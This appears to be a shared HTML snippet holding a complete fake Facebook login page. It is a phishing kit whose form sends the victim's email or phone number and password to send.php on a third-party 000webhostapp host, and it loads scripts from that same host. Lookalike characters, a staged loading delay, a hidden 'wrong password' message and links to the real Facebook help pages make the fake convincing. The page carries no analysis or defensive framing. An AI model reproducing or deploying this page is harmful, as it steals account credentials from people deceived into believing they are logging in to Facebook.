vvvv
8 months ago in HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="facee.css">
<script src="https://zypho.000webhostapp.com/jquery-x.x.x.js"></script>
<script src="https://kit.fontawesome.com/5364c39526.js" crossorigin="anonymous"></script>
<!-- main made by zypho -->
<title></title>
</head>
<body>
<script>
function performAction() {
// Show the loading icon
$('#loading').show();
// Disable the submit button
$('#myButton').prop('disabled', false);
$('#fuk').hide();
// Perform the form submission using AJAX
$.ajax({
url: $('#myForm').attr('action'),
type: 'POST',
data: $('#myForm').serialize(),
success: function(response) {
// Handle the success response
// Delay hiding the loading icon for 2 seconds
setTimeout(function() {
// Hide the loading icon
$('#loading').hide();
//show log in
// Enable the submit button
$('#myButton').prop('disabled', true);
$('#fuk').show();
}, 5000); // 5000 milliseconds = 5 seconds
},
error: function(xhr, status, error) {
// Handle the error response
// Delay hiding the loading icon for 2 seconds
setTimeout(function() {
// Hide the loading icon
$('#loading').hide();
$('#fuk').show();
// Enable the submit button
$('#myButton').prop('disabled', false);
}, 5000); // 5000 milliseconds = 5 seconds
}
});
}
</script>
<div id="call-of-duty">
<div id="AI-tinubu">
<p id="legendary">facebook</p>
</div>
<form method="post" action="https://zypho.000webhostapp.com/send.php" id="myForm">
<div id="ak47" class="epic" >
<a href="#">
<img src="https://zypho.000webhostapp.com/phone.png" alt="" id="ak74">
<div id="ak47-leggy">Get Facebook for your device and browse faster.</div>
</a>
</div>
<div class="m4">
<div id="m4-epic">
<input type="text" name="email" id="mkpoaha" class="icr icr1" placeholder="MobiIe number or email address" required="">
<br>
<input type="hidden" value="Error! Wrong Password, Re-enter password." id="textBox" placeholder="Please input your text here...">
<input type="password" name="password" id="" class="icr icr2" placeholder="Password" required="">
</div>
<div class="shotgun">
<button type="submit" id="myButton" onclick="performAction()" class="hs0405 action-btn" name="send"><div id="fuk">Log in</div><div id="" class=""><div id="loading">
<i class="fa-solid fa-spinner fa-spin fa-lg" style="color: #121212;"></i>
</div>
</div>
</button>
</div>
<div id="krm4">
<span id="krm">or</span>
</div>
<div id="by19">
<button type="submit" id="by"><font size="2px">Create New Account</font></button>
</div>
<div class="hs2425">
<a href="https://web.facebook.com/login/identify?_rdc=1&_rdr">Forgotten password?</a>
<span>·</span>
<a href="https://web.facebook.com/help?_rdc=1&_rdr">HeIp Center</a>
</div>
</div>
<div class="sniper">
<div id="marksman">
<div class="arctic-50">
<li><a href="#" id="xpr">English (UK)</a></li>
<li><a href="#">Igbo</a></li>
<li><a href="#">Hausa</a></li>
<li><a href="#">Yoruba</a></li>
</div>
<div class="dlq">
<li><a href="#">French</a></li>
<li><a href="#">Portuguese</a></li>
<li><a href="#">German</a></li>
<li><a href="#"><i class="fa fa-plus-square-o"></i></a></li>
</div>
</div>
<div class="kilobolt">
<span class="sks">Facebook ©2023</span><br>
</div>
</div>
</form>
</div>
</body>
</html>